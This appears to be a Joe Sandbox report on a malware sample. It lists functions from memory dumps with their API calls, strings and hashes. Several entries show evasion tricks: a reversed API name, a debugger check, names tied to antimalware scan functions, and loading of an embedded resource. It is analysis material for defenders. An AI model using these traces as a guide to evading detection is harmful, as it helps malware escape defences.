GetThreadLocale.KERNEL32(00000000,00000004,00000000,027CAA6F,?,?,00000000), ref: 027CAA20
EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 027CAA2B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,027CAA6F,?,?,00000000), ref: 027CAA49
EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 027CAA54

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 12dac8e19ad1852cf6e9eceb9bb22409608be0e12dde8da24a9178ad7d0e4a01
Instruction ID: c7e6d10799c9aff47cc17c8a987bdacb2cb83931e94a0ce5a8df34381a239321
Opcode Fuzzy Hash: 12dac8e19ad1852cf6e9eceb9bb22409608be0e12dde8da24a9178ad7d0e4a01
Instruction Fuzzy Hash: 74012675600A5C6FF703FAB48D16B6E775DDB86721FB1016CF600E6BC4D6749E008AA8

Function 027CAA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,027CAC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027CAAB7

Part of subcall function 027CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A

Strings

ggg, xrefs: 027CAB9D
eeee, xrefs: 027CABC6
yyyy, xrefs: 027CABAD

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: fdf46422bb15996be9345859de06a8ac0aa4916fc76ac77595c7d0ddc6175ab4
Instruction ID: 265be3809ff567752db84401002d49463c412d607a2081c08d5dfd9b73ef06fe
Opcode Fuzzy Hash: fdf46422bb15996be9345859de06a8ac0aa4916fc76ac77595c7d0ddc6175ab4
Instruction Fuzzy Hash: 6441E27470450E4BD723AF78C8A86BEB3ABDB85302F34463ED462D7344E638D9058A21

Function 027D8020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Strings

AeldnaHeludoMteG, xrefs: 027D8039
KernelBASE, xrefs: 027D8059

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 9f8e2423de8a5835bb7e47e7028e6dc899355c0a91610d9b075c3c68e7241f02
Instruction ID: 003c0a418d7efa8731eaf37614967d88716607eecfd28b960508fcf674853594
Opcode Fuzzy Hash: 9f8e2423de8a5835bb7e47e7028e6dc899355c0a91610d9b075c3c68e7241f02
Instruction Fuzzy Hash: D2F0C279600304AFEB11EFB4D91D91E7BBEE749700BA24868F400D3A00D634AD058A25

Function 027DEB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,027DEF98,UacInitialize,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,Initialize), ref: 027DEB9A
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027DEBAC

Strings

IsDebuggerPresent, xrefs: 027DEBA6
KernelBase, xrefs: 027DEB95

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 38ee87666a58dcc8da6e9fc9c45aefcdbd9d74b31f1d178c99d8685cfe446c80
Instruction ID: 218846407c1d2b5d619c3ee1ae7557a579076c2cd3413ef5df780a66de8c0fd7
Opcode Fuzzy Hash: 38ee87666a58dcc8da6e9fc9c45aefcdbd9d74b31f1d178c99d8685cfe446c80
Instruction Fuzzy Hash: F4D08CE27557101FFA027AF40CC8C2E0ADD8B8563E3340F79F063EA1D2E6BAD8521510

Function 027CC3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,027EC10B,00000000,027EC11E), ref: 027CC402
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027CC413

Strings

GetDiskFreeSpaceExA, xrefs: 027CC40D
kernel32.dll, xrefs: 027CC3FD

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: ee95535ceae321a446f899ad1eec1e49d3cab24163cc8634f1bb5339cb38eaf2
Instruction ID: 03155a981350899e5719746aa6be458565c345b2fe1ab3b1b8556286f6a950f8
Opcode Fuzzy Hash: ee95535ceae321a446f899ad1eec1e49d3cab24163cc8634f1bb5339cb38eaf2
Instruction Fuzzy Hash: 3FD05EB0A403018EEB12AAB168C56322E8C8748745BB0D82EB01959101E77245104FA4

Function 027CE170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027CE21F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027CE23B
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027CE2B2
VariantClear.OLEAUT32(?), ref: 027CE2DB

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 66d10c83447bc753f81b1351100d99e366b7532ae374a69602f4854351764fc9
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 44411875A0061D9FCB62DB68CC94BD9B3BDBB49300F1041EDEA48A7301DA30AF808F50

Function 027CACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 027CACE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027CAD05
GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027CAD20
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027CADB6

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 7459ec85b8504d81e14016a10e18fbffccacb0cc7920e81b22f2fcfe11ce56a5
Instruction ID: d0d99f6c6b23318a82975bd669329d04b312f7321c921ae11f2b063c8b41ecdf
Opcode Fuzzy Hash: 7459ec85b8504d81e14016a10e18fbffccacb0cc7920e81b22f2fcfe11ce56a5
Instruction Fuzzy Hash: 52410B71A4025C9BDB22DF78CC88BDAB7FDAB18301F2044EDA548A7245DB759B848F51

Function 027CACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 027CACE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027CAD05
GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027CAD20
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027CADB6

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 9d7fc9f71498792909b65b2d7cf24e31ba31f22b7c542ea305a9ee9a5f43ae5f
Instruction ID: 1e74469ea03d589a08e4d892dae02775db51f9606f604e247a094fb7b248915c
Opcode Fuzzy Hash: 9d7fc9f71498792909b65b2d7cf24e31ba31f22b7c542ea305a9ee9a5f43ae5f
Instruction Fuzzy Hash: 61411870A4025C9BDB22EB78CC88BDAB7FDAB18301F2040EDA548E7241DB759E848F51

Function 027C1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847c6cb56ab3ccf762ccdf2cd181f43277fb2c6fa8d5dcd06a81a6e8765e1bcb
Instruction ID: a5ced1d7b4596b35e84262ec867e3aae95e6fa145e69d3a47b9ee14496e07d73
Opcode Fuzzy Hash: 847c6cb56ab3ccf762ccdf2cd181f43277fb2c6fa8d5dcd06a81a6e8765e1bcb
Instruction Fuzzy Hash: F5A1F5A67116000BE719AA7D9C843ADB3C6DBC4326FB8427EE51DCB3C3EB64C9518750

Function 027C9474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027C9562), ref: 027C94FA
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027C9562), ref: 027C9500

Strings

yyyy, xrefs: 027C94D5

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 171a9532637eb922d6314b57400fda91528069c9deb6e8ce2ed19851a4002a39
Instruction ID: ddd7a69aa16548dd781cc710273c2d14676b0cf876df1432b0f4bc9e8f2eb5b8
Opcode Fuzzy Hash: 171a9532637eb922d6314b57400fda91528069c9deb6e8ce2ed19851a4002a39
Instruction Fuzzy Hash: 3A217E76A002289FDB51DBB4D895ABAB3B9EF48710F6100ADEA05E7280D6309F008B65

Function 027D818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027D8216), ref: 027D81F8

Strings

Kernel32, xrefs: 027D81D7
FlushInstructionCache, xrefs: 027D81A5

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: a9e39169fd28eeb6a913109a20a8d5bf7a67499c1a00f49ada7e156e5401cda4
Instruction ID: 87720f675854520081dcb708297f4940cd393edf247cee2954ea223663739208
Opcode Fuzzy Hash: a9e39169fd28eeb6a913109a20a8d5bf7a67499c1a00f49ada7e156e5401cda4
Instruction Fuzzy Hash: 78018B79640204AFEB11EEA4DC69B5B37AEE708B00F728428B504D3A40D674AD008B25

Function 027C6444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 027C644D
TlsGetValue.KERNEL32(00000020), ref: 027C6462

Strings

QV, xrefs: 027C6467

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AllocValue
String ID: QV
API String ID: 1189806713-3869509414
Opcode ID: e73eb86d1415971d9106e5c39a3e5146bc6ad82b47d48266c48e0c800fe5c31c
Instruction ID: 4e7183bbd803ca9ecad0ebcaa4617b0e59859920c3397a1f45a509a4196ae15b
Opcode Fuzzy Hash: e73eb86d1415971d9106e5c39a3e5146bc6ad82b47d48266c48e0c800fe5c31c
Instruction Fuzzy Hash: 45C002B4D503229AEF21BBB5948960A369EEBC4305F20992DB510CF148DB36C615DF64

Function 027DAD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 027DAD98
IsBadWritePtr.KERNEL32(?,00000004), ref: 027DADC8
IsBadReadPtr.KERNEL32(?,00000008), ref: 027DADE7
IsBadReadPtr.KERNEL32(?,00000004), ref: 027DADF3

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
Instruction ID: 4c3dd244805e3bd6c46751bb30de44d677a380fec3f573e279b86c8edb9c4e46
Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
Instruction Fuzzy Hash: 5721B4B1A403199BDF11DF6ACC80BAE77B9FF80312F144115EE50A7344EB34D911DAA4

Analysis Process: rpkhzpuO.pifPID: 6480, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	4.6%
Total number of Nodes:	1251
Total number of Limit Nodes:	49

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

W, xrefs: 004020E6
v, xrefs: 00401E4B
v, xrefs: 00401B5A
x, xrefs: 00401B78
V, xrefs: 00402038
E, xrefs: 00401E0F
{, xrefs: 0040205B
), xrefs: 0040202E
h, xrefs: 00401A6F
[, xrefs: 00402047
4, xrefs: 00401B64
!, xrefs: 0040201A
x, xrefs: 00402088
o, xrefs: 00401B8D
[, xrefs: 00401B37
x, xrefs: 0040214A
6, xrefs: 004020C5
x, xrefs: 00401E69
W, xrefs: 00402033
:, xrefs: 00401B28
W, xrefs: 00401B23
D, xrefs: 00401DFB
., xrefs: 00401B0A
5, xrefs: 00402109
_._, xrefs: 00402257
0, xrefs: 00401BBD
., xrefs: 0040201F
W, xrefs: 00401B14
v, xrefs: 0040206A
v, xrefs: 0040212C
4, xrefs: 00402074
*, xrefs: 00401A1F
U, xrefs: 004020F5
8, xrefs: 00401BA9
V, xrefs: 00401E19
___, xrefs: 0040227D
', xrefs: 00401AF6
", xrefs: 00401B0F
o, xrefs: 00402159
{, xrefs: 00401E3C
', xrefs: 00402006
%, xrefs: 004020FA
4, xrefs: 00402136
{, xrefs: 00401B4B
!, xrefs: 004020CF
*, xrefs: 004020E1
{, xrefs: 0040211D
o, xrefs: 00402097
!, xrefs: 00401B1E

Memory Dump Source

Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

